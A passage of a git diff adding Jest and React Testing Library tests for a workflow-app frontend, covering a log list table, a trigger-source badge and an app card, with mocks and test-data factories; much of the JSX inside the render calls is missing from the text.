============================================================================ +// Tests +// ============================================================================ + +describe('WorkflowAppLogList', () => { + const defaultOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading state when logs are undefined', () => { + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render loading state when appDetail is undefined', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render table when data is available', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + 
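+    // A hedged extra case, sketching the loading-to-data transition via rerender.
+    // The prop shape (logs / appDetail / onRefresh) is assumed from its usage
+    // elsewhere in this spec rather than re-verified against ./list.
+    it('should replace the loading spinner with the table once logs arrive', () => {
+      const { container, rerender } = render(
+        <WorkflowAppLogList logs={undefined} appDetail={createMockApp()} onRefresh={defaultOnRefresh} />,
+      )
+      expect(container.querySelector('.spin-animation')).toBeInTheDocument()
+
+      rerender(
+        <WorkflowAppLogList logs={createMockLogsResponse([createMockWorkflowLog()])} appDetail={createMockApp()} onRefresh={defaultOnRefresh} />,
+      )
+      expect(container.querySelector('.spin-animation')).not.toBeInTheDocument()
+      expect(screen.getByRole('table')).toBeInTheDocument()
+    })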
it('should render all table headers', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() + }) + + it('should render trigger column for workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() + }) + + it('should not render trigger column for non-workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Display Tests + // -------------------------------------------------------------------------- + describe('Status Display', () => { + it('should render success status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'succeeded' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should render failure status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'failed' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Failure')).toBeInTheDocument() + }) + + it('should render stopped status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'stopped' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Stop')).toBeInTheDocument() + }) + + it('should render running status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'running' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Running')).toBeInTheDocument() + }) + + it('should render partial-succeeded status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'partial-succeeded' as WorkflowRunDetail['status'] }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // User Info Display Tests + // -------------------------------------------------------------------------- + describe('User Info Display', () => { + it('should display account name when created by account', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: { id: 'acc-1', name: 'John Doe', email: 'john@example.com' }, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('John Doe')).toBeInTheDocument() + }) + + it('should display end user session id when created by end user', () => { + const logs = 
createMockLogsResponse([ + createMockWorkflowLog({ + created_by_end_user: { id: 'user-1', type: 'browser', is_anonymous: false, session_id: 'session-abc-123' }, + created_by_account: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('session-abc-123')).toBeInTheDocument() + }) + + it('should display N/A when no user info', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: undefined, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('N/A')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Sorting Tests + // -------------------------------------------------------------------------- + describe('Sorting', () => { + it('should sort logs in descending order by default', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + // First row is header, data rows start from index 1 + // In descending order, newest (3000) should be first + expect(rows.length).toBe(4) // 1 header + 3 data rows + }) + + it('should toggle sort order when clicking on start time header', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + ]) + + render( + , + ) + + // Click on the start time header to toggle sort + const startTimeHeader = screen.getByText('appLog.table.header.startTime') + await user.click(startTimeHeader) + + // Arrow should rotate (indicated by class change) + // The sort icon should have rotate-180 class for ascending + const sortIcon = startTimeHeader.closest('div')?.querySelector('svg') + expect(sortIcon).toBeInTheDocument() + }) + + it('should render sort arrow icon', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + // Check for ArrowDownIcon presence + const sortArrow = container.querySelector('svg.ml-0\\.5') + expect(sortArrow).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Drawer Tests + // -------------------------------------------------------------------------- + describe('Drawer', () => { + it('should open drawer when clicking on a log row', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-123' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + id: 'log-1', + workflow_run: createMockWorkflowRun({ id: 'run-456' }), + }), + ]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) // Click first data row + + const dialog = await screen.findByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should close drawer and call onRefresh when closing', async () => { + const user = userEvent.setup() + const onRefresh = jest.fn() + useAppStore.setState({ appDetail: createMockApp() }) + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await 
screen.findByRole('dialog') + + // Close drawer using Escape key + await user.keyboard('{Escape}') + + await waitFor(() => { + expect(onRefresh).toHaveBeenCalled() + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should highlight selected row', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + const dataRow = dataRows[1] + + // Before click - no highlight + expect(dataRow).not.toHaveClass('bg-background-default-hover') + + // After click - has highlight (via currentLog state) + await user.click(dataRow) + + // The row should have the selected class + expect(dataRow).toHaveClass('bg-background-default-hover') + }) + }) + + // -------------------------------------------------------------------------- + // Replay Functionality Tests + // -------------------------------------------------------------------------- + describe('Replay Functionality', () => { + it('should allow replay when triggered from app-run', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'run-to-replay', + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for app-run triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay/workflow?replayRunId=run-to-replay') + }) + + it('should allow replay when triggered from debugging', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-debug' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'debug-run', + triggered_from: WorkflowRunTriggeredFrom.DEBUGGING, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for debugging triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + }) + + it('should not show replay for webhook triggers', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-webhook' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'webhook-run', + triggered_from: WorkflowRunTriggeredFrom.WEBHOOK, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should not be present for webhook triggers + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Unread Indicator Tests + // -------------------------------------------------------------------------- + describe('Unread Indicator', () => { + it('should show unread 
indicator for unread logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: undefined, + }), + ]) + + const { container } = render( + , + ) + + // Unread indicator is a small blue dot + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).toBeInTheDocument() + }) + + it('should not show unread indicator for read logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: Date.now(), + }), + ]) + + const { container } = render( + , + ) + + // No unread indicator + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Runtime Display Tests + // -------------------------------------------------------------------------- + describe('Runtime Display', () => { + it('should display elapsed time with 3 decimal places', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 1.23456 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('1.235s')).toBeInTheDocument() + }) + + it('should display 0 elapsed time with special styling', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), + }), + ]) + + render( + , + ) + + const zeroTime = screen.getByText('0.000s') + expect(zeroTime).toBeInTheDocument() + expect(zeroTime).toHaveClass('text-text-quaternary') + }) + }) + + // -------------------------------------------------------------------------- + // Token Display Tests + // -------------------------------------------------------------------------- + describe('Token Display', () => { + it('should display total tokens', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ total_tokens: 12345 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('12345')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty table when logs data is empty', () => { + const logs = createMockLogsResponse([]) + + render( + , + ) + + const table = screen.getByRole('table') + expect(table).toBeInTheDocument() + + // Should only have header row + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle multiple logs correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(4) // 1 header + 3 data rows + }) + + it('should handle logs with missing workflow_run data gracefully', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + elapsed_time: 0, + total_tokens: 0, + }), + }), + ]) + + render( + , + ) + + 
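+      // Zero metrics should still render as explicit values rather than blank cells.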
expect(screen.getByText('0.000s')).toBeInTheDocument() + expect(screen.getByText('0')).toBeInTheDocument() + }) + + it('should handle null workflow_run.triggered_from for non-workflow apps', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + triggered_from: undefined as any, + }), + }), + ]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/workflow-log/trigger-by-display.spec.tsx b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx new file mode 100644 index 0000000000..6e95fc2f35 --- /dev/null +++ b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx @@ -0,0 +1,371 @@ +/** + * TriggerByDisplay Component Tests + * + * Tests the display of workflow trigger sources with appropriate icons and labels. + * Covers all trigger types: app-run, debugging, webhook, schedule, plugin, rag-pipeline. + */ + +import { render, screen } from '@testing-library/react' +import TriggerByDisplay from './trigger-by-display' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import type { TriggerMetadata } from '@/models/log' +import { Theme } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +let mockTheme = Theme.light +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => ({ theme: mockTheme }), +})) + +// Mock BlockIcon as it has complex dependencies +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: ({ type, toolIcon }: { type: string; toolIcon?: string }) => ( +
    <div data-testid="block-icon" data-type={type} data-tool-icon={toolIcon ?? ''}>
+      BlockIcon
+    </div>
+ ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createTriggerMetadata = (overrides: Partial = {}): TriggerMetadata => ({ + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('TriggerByDisplay', () => { + beforeEach(() => { + jest.clearAllMocks() + mockTheme = Theme.light + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render icon container', () => { + const { container } = render( + , + ) + + // Should have icon container with flex layout + const iconContainer = container.querySelector('.flex.items-center.justify-center') + expect(iconContainer).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should apply custom className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('custom-class') + }) + + it('should show text by default (showText defaults to true)', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should hide text when showText is false', () => { + render( + , + ) + + expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Trigger Type Display Tests + // -------------------------------------------------------------------------- + describe('Trigger Types', () => { + it('should display app-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should display debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.debugging')).toBeInTheDocument() + }) + + it('should display webhook trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.webhook')).toBeInTheDocument() + }) + + it('should display schedule trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.schedule')).toBeInTheDocument() + }) + + it('should display plugin trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should display rag-pipeline-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineRun')).toBeInTheDocument() + }) + + it('should display rag-pipeline-debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineDebugging')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Plugin Metadata Tests + // -------------------------------------------------------------------------- + describe('Plugin Metadata', () => { + 
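+    // These cases pin down the resolution order for plugin triggers: a custom
+    // event_name overrides the generic label, and in dark theme icon_dark is
+    // preferred, with icon as the fallback.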
it('should display custom event name from plugin metadata', () => { + const metadata = createTriggerMetadata({ event_name: 'Custom Plugin Event' }) + + render( + , + ) + + expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() + }) + + it('should fallback to default plugin text when no event_name', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should use plugin icon from metadata in light theme', () => { + mockTheme = Theme.light + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use dark plugin icon in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'dark-icon.png') + }) + + it('should fallback to light icon when dark icon not available in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use default BlockIcon when plugin has no icon metadata', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', '') + }) + }) + + // -------------------------------------------------------------------------- + // Icon Rendering Tests + // -------------------------------------------------------------------------- + describe('Icon Rendering', () => { + it('should render WindowCursor icon for app-run trigger', () => { + const { container } = render( + , + ) + + // Check for the blue brand background used for app-run icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-brand-blue-brand-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Code icon for debugging trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for debugging icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render WebhookLine icon for webhook trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for webhook icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Schedule icon for schedule trigger', () => { + const { container } = render( + , + ) + + // Check for the violet background used for schedule icon + const iconWrapper = container.querySelector('.bg-util-colors-violet-violet-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render KnowledgeRetrieval icon for rag-pipeline triggers', () => { + const { container } = render( + , + ) + + // Check for the green background used for rag pipeline icon + const iconWrapper = container.querySelector('.bg-util-colors-green-green-500') + expect(iconWrapper).toBeInTheDocument() + }) + }) + + // 
-------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle unknown trigger type gracefully', () => { + // Test with a type cast to simulate unknown trigger type + render() + + // Should fallback to default (app-run) icon styling + expect(screen.getByText('unknown-type')).toBeInTheDocument() + }) + + it('should handle undefined triggerMetadata', () => { + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should handle empty className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'items-center', 'gap-1.5') + }) + + it('should render correctly when both showText is false and metadata is provided', () => { + const metadata = createTriggerMetadata({ event_name: 'Test Event' }) + + render( + , + ) + + // Text should not be visible even with metadata + expect(screen.queryByText('Test Event')).not.toBeInTheDocument() + expect(screen.queryByText('appLog.triggerBy.plugin')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Theme Switching Tests + // -------------------------------------------------------------------------- + describe('Theme Switching', () => { + it('should render correctly in light theme', () => { + mockTheme = Theme.light + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render correctly in dark theme', () => { + mockTheme = Theme.dark + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/app-card.spec.tsx b/web/app/components/apps/app-card.spec.tsx new file mode 100644 index 0000000000..40aa66075d --- /dev/null +++ b/web/app/components/apps/app-card.spec.tsx @@ -0,0 +1,1059 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { AppModeEnum } from '@/types/app' +import { AccessMode } from '@/models/access-control' + +// Mock next/navigation +const mockPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + }), +})) + +// Mock use-context-selector with stable mockNotify reference for tracking calls +// Include createContext for components that use it (like Toast) +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => { + const React = require('react') + return { + createContext: (defaultValue: any) => React.createContext(defaultValue), + useContext: () => ({ + notify: mockNotify, + }), + useContextSelector: (_context: any, selector: any) => selector({ + notify: mockNotify, + }), + } +}) + +// Mock app context +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: true, + }), +})) + +// Mock provider context +const mockOnPlanInfoChanged = jest.fn() +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + onPlanInfoChanged: mockOnPlanInfoChanged, + }), +})) + +// Mock global public store +jest.mock('@/context/global-public-context', () => ({ + useGlobalPublicStore: (selector: (s: any) => any) => selector({ + systemFeatures: { + webapp_auth: { enabled: false }, + branding: { enabled: false }, + }, + }), +})) + +// Mock API services - import for direct manipulation 
+import * as appsService from '@/service/apps' +import * as workflowService from '@/service/workflow' + +jest.mock('@/service/apps', () => ({ + deleteApp: jest.fn(() => Promise.resolve()), + updateAppInfo: jest.fn(() => Promise.resolve()), + copyApp: jest.fn(() => Promise.resolve({ id: 'new-app-id' })), + exportAppConfig: jest.fn(() => Promise.resolve({ data: 'yaml: content' })), +})) + +jest.mock('@/service/workflow', () => ({ + fetchWorkflowDraft: jest.fn(() => Promise.resolve({ environment_variables: [] })), +})) + +jest.mock('@/service/explore', () => ({ + fetchInstalledAppList: jest.fn(() => Promise.resolve({ installed_apps: [{ id: 'installed-1' }] })), +})) + +jest.mock('@/service/access-control', () => ({ + useGetUserCanAccessApp: () => ({ + data: { result: true }, + isLoading: false, + }), +})) + +// Mock hooks +jest.mock('@/hooks/use-async-window-open', () => ({ + useAsyncWindowOpen: () => jest.fn(), +})) + +// Mock utils +jest.mock('@/utils/app-redirection', () => ({ + getRedirection: jest.fn(), +})) + +jest.mock('@/utils/var', () => ({ + basePath: '', +})) + +jest.mock('@/utils/time', () => ({ + formatTime: () => 'Jan 1, 2024', +})) + +// Mock dynamic imports +jest.mock('next/dynamic', () => { + const React = require('react') + return (importFn: () => Promise) => { + const fnString = importFn.toString() + + if (fnString.includes('create-app-modal') || fnString.includes('explore/create-app-modal')) { + return function MockEditAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'edit-app-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-edit-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Updated App', + icon_type: 'emoji', + icon: '🎯', + icon_background: '#FFEAD5', + description: 'Updated description', + use_icon_as_answer_icon: false, + max_active_requests: null, + }), + 'data-testid': 'confirm-edit-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('duplicate-modal')) { + return function MockDuplicateAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'duplicate-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-duplicate-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Copied App', + icon_type: 'emoji', + icon: '📋', + icon_background: '#E4FBCC', + }), + 'data-testid': 'confirm-duplicate-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('switch-app-modal')) { + return function MockSwitchAppModal({ show, onClose, onSuccess }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'switch-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-switch-modal' }, 'Close'), + React.createElement('button', { 'onClick': onSuccess, 'data-testid': 'confirm-switch-modal' }, 'Switch'), + ) + } + } + if (fnString.includes('base/confirm')) { + return function MockConfirm({ isShow, onCancel, onConfirm }: any) { + if (!isShow) return null + return React.createElement('div', { 'data-testid': 'confirm-dialog' }, + React.createElement('button', { 'onClick': onCancel, 'data-testid': 'cancel-confirm' }, 'Cancel'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-confirm' }, 'Confirm'), + ) + } + } + if (fnString.includes('dsl-export-confirm-modal')) { + return function 
MockDSLExportModal({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'dsl-export-modal' }, + React.createElement('button', { 'onClick': () => onClose?.(), 'data-testid': 'close-dsl-export' }, 'Close'), + React.createElement('button', { 'onClick': () => onConfirm?.(true), 'data-testid': 'confirm-dsl-export' }, 'Export with secrets'), + React.createElement('button', { 'onClick': () => onConfirm?.(false), 'data-testid': 'confirm-dsl-export-no-secrets' }, 'Export without secrets'), + ) + } + } + if (fnString.includes('app-access-control')) { + return function MockAccessControl({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'access-control-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-access-control' }, 'Close'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-access-control' }, 'Confirm'), + ) + } + } + return () => null + } +}) + +/** + * Mock components that require special handling in test environment. + * + * Per frontend testing skills (mocking.md), we should NOT mock simple base components. + * However, the following require mocking due to: + * - Portal-based rendering that doesn't work well in happy-dom + * - Deep dependency chains importing ES modules (like ky) incompatible with Jest + * - Complex state management that requires controlled test behavior + */ + +// Popover uses portals for positioning which requires mocking in happy-dom environment +jest.mock('@/app/components/base/popover', () => { + const MockPopover = ({ htmlContent, btnElement, btnClassName }: any) => { + const [isOpen, setIsOpen] = React.useState(false) + // Call btnClassName to cover lines 430-433 + const computedClassName = typeof btnClassName === 'function' ? btnClassName(isOpen) : '' + return React.createElement('div', { 'data-testid': 'custom-popover', 'className': computedClassName }, + React.createElement('div', { + 'onClick': () => setIsOpen(!isOpen), + 'data-testid': 'popover-trigger', + }, btnElement), + isOpen && React.createElement('div', { + 'data-testid': 'popover-content', + 'onMouseLeave': () => setIsOpen(false), + }, + typeof htmlContent === 'function' ? 
htmlContent({ open: isOpen, onClose: () => setIsOpen(false), onClick: () => setIsOpen(false) }) : htmlContent, + ), + ) + } + return { __esModule: true, default: MockPopover } +}) + +// Tooltip uses portals for positioning - minimal mock preserving popup content as title attribute +jest.mock('@/app/components/base/tooltip', () => ({ + __esModule: true, + default: ({ children, popupContent }: any) => React.createElement('div', { title: popupContent }, children), +})) + +// TagSelector imports service/tag which depends on ky ES module - mock to avoid Jest ES module issues +jest.mock('@/app/components/base/tag-management/selector', () => ({ + __esModule: true, + default: ({ tags }: any) => { + const React = require('react') + return React.createElement('div', { 'aria-label': 'tag-selector' }, + tags?.map((tag: any) => React.createElement('span', { key: tag.id }, tag.name)), + ) + }, +})) + +// AppTypeIcon has complex icon mapping logic - mock for focused component testing +jest.mock('@/app/components/app/type-selector', () => ({ + AppTypeIcon: () => React.createElement('div', { 'data-testid': 'app-type-icon' }), +})) + +// Import component after mocks +import AppCard from './app-card' + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Record = {}) => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + mode: AppModeEnum.CHAT, + icon: '🤖', + icon_type: 'emoji' as const, + icon_background: '#FFEAD5', + icon_url: null, + author_name: 'Test Author', + created_at: 1704067200, + updated_at: 1704153600, + tags: [], + use_icon_as_answer_icon: false, + max_active_requests: null, + access_mode: AccessMode.PUBLIC, + has_draft_trigger: false, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as any, + app_model_config: {} as any, + site: {} as any, + api_base_url: 'https://api.example.com', + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('AppCard', () => { + const mockApp = createMockApp() + const mockOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + // Use title attribute to target specific element + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app name', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app description', () => { + render() + expect(screen.getByTitle('Test app description')).toBeInTheDocument() + }) + + it('should display author name', () => { + render() + expect(screen.getByTitle('Test Author')).toBeInTheDocument() + }) + + it('should render app icon', () => { + // AppIcon component renders the emoji icon from app data + const { container } = render() + // Check that the icon container is rendered (AppIcon renders within the card) + const iconElement = 